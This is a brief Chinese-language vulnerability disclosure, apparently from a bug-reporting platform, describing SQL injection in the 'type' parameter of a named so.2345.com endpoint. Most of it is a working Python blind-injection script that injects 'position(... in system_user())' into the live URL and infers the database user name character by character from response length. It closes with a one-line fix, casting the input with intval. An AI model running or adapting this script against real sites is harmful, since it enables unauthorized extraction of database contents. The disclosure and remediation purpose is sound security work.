注入点 https://so.2345.com/2345app/get_app_news.php?nt=0&type=660&id=

注入参数 type

有过滤

True
 

屏幕快照 2016-04-13 19.00.05.png



False
 

屏幕快照 2016-04-13 19.00.14.png

user [email protected]
 

屏幕快照 2016-04-13 19.00.56.png


 

#!/usr/bin/env python #-*- coding: utf-8 -*- import time import string import binascii import requests res = '' character = "%." + string.digits + "@" + string.ascii_uppercase + "_" + string.ascii_lowercase headers = { 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.69 Safari/537.36', 'Referer': '', } for i in range(1, 21): for p in character: while True: try: url = "https://so.2345.com/2345app/get_app_news.php?nt=0&type=660 and position({} in system_user())={}&id=".format('0x' + binascii.b2a_hex(p), i) req = requests.get(url, headers=headers) print req.url + ' --- ', print len(req.text) break except: pass if len(req.text) > 100: res += p print "\n[Result]: " + res + "\n" break time.sleep(0.5) print "\n\n[Finish]: " + res 解决方案:

直接intval吧!